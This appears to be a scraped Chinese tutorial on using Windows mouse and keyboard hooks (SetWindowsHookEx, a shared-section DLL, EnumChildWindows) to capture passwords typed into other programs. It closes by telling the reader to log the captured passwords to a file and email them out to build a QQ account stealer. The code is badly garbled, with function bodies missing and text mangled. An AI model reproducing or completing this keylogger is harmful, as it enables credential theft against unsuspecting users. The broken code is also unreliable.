利用鼠标键盘钩子截获密码

钩子能截获系统并得理发送给其它应用程序的消息，能完成一般程序无法完成的功能。把握钩子的编程方法是很有必要的

钩子分类：
1、WH_CALLWNDPROC和WH_CALLWNDPROCRET：使你可以监视发送到窗口过程的消息
3、WH_DEBUG调试钩子
4、WH_FOREGROUNDIDLE当当应用程序的前台线程大概要变成空闲状态时，系统就会调用WH_FOREGROUNDIDL
5、WH_JOURNALRECORD监视和记录输入事件
WH_JOURNALPLAYBACK回放用WH_JOURNALRECORD记录事件
WH_KEYBOARD键盘钩子
WH_KEYBOARD_LL低层键盘钩子
WH_MOUSE鼠标钩子
11、WH_MOUSE_LL底层鼠标钩子
WH_SHELL外壳钩子
13、WH_MSGFILTER和WH_SYSMSGFILTER使我们可以监视菜单，滚动条，消息框等

安装钩子：
调用函数SetWindowsHookEx安装钩子。其函数原型为：
HHOOKSetWindowsHookEx
idHook表示钩子类型，它是和钩子函数类型一一对应的。如，WH_KEYBOARD，WH_MOUSE。
Lpfn是钩子函数的地址。
HMod是钩子函数所在的实例的句柄。对于线程钩子，该参数为NULL；对于系统钩子，该参数为钩子函数所在的DLL句柄。卸载钩子

定义钩子函数
钩子函数是一种非凡的回调函数。钩子监视的特定事件发生后，系统会调用钩子函数进行处理。一般为下：
LRESULTWINAPIMyHookProc
参数wParam和lParam包含所钩消息的信息，比如鼠标位置、状态，键盘按键等。nCode包含有关消息本身的信，比如是否从消息队列中移出。

实例：
下面我们通过安装鼠标钩子。和键盘钩子还截获输入的密码，并可查看密码为例，来说明何何使用钩子。

1，进入向导，新建MFCAppWizard取名为GetPass，选择MFCExtensionDLL，完成。
2，新建一个CGetPassHook类，基类：CObject，并加入StartHook，StopHook，函数，如下：
classAFX_EXT_CLASSCGetPassHook：publicCObject
;
3：加入全局共享数据，如下：
file：//keyboarhook
HHOOKhMouseHook=NULL;file：//mousehook
HINSTANCEglhInstance=NULL;file：//globleinstance
HWNDhOutPutWnd=NULL;file：//DisplayPassWnd

file：//加上这句，就可以继续传递消息，假如没有，则会取消此消息的传递，
file：//可以起到截儿消息的目的，我们这里调用之。
}

LRESULTWINAPIKeyBoardProc

returnCallNextHookEx;
file：//加上这句，就可以继续传递消息，假如没有，则会取消此消息的传递，
file：//可以起到截儿消息的目的，我们这里调用之。
}

这里要介绍下EnumChildWindows函数，原形如下：
BOOLEnumChildWindows;
hWndParent：为枚举窗口的句柄
lpEnumFunc：枚举函数的地址，
lParam：这里为0

5：加入枚举窗口的函数。如下：
SECTIONS
mydataREADWRITESHARED

7：完成StartHook，StopHook函数，启动/关闭钩子，如下：
BOOLCGetPassHook：：StartHook

returnFALSE;
}

BOOLCGetPassHook：：StopHook

8：在DLLMAIN函数中得到DLL句柄，要用到glhInstance变量，因此要加入一句，如下：
externHINSTANCEglhInstance;file：//记得这里
extern“C“intAPIENTRY
DllMain

elseif

return1;//ok
}

9：编译，完成DLL部分，

下面建立APP部分。如下：

1：新建MFCAppWizard命名为GetPassWord，并在第一步中选择AddtoCurrentWorkSpace加入到当前工作区，这样方便。

2：将刚才的DLL中的GetPass.lib，和GetPassHook.h拷贝APP所在目录，然后Project-AddtoProject--Files
选择这两个文件。

2：在主对话框中，加入一个EDIT，ID为IDC_EDIT_PASS

3：在CGetPassWordDlg.h中包含GetPassHook.h文件，声明一个对象。如下：

 

4：在实现文件中：OnInitDialog中起动HOOK

BOOLCGetPassWordDlg：：OnInitDialog

5：加入WM_DESTROY消息，在退出程序时停止HOOK，如下：
voidCGetPassWordDlg：：OnDestroy

6：将GetPass.dll拷贝到。EXE一个目录下，

7：编译，运行.
这样，你在输入任何密码框输入密码时，密码都将截获。就算键盘HOOK失效，移动鼠标到密码框，也都获取号密码，因为我们安装两个HOOK。启动QQ，输入密码，试下看是否已经截获了密码？将本程序稍做修改，将截获的密码输出到文件，并加入发送邮件攻能，一个QQ盗号器就做成了。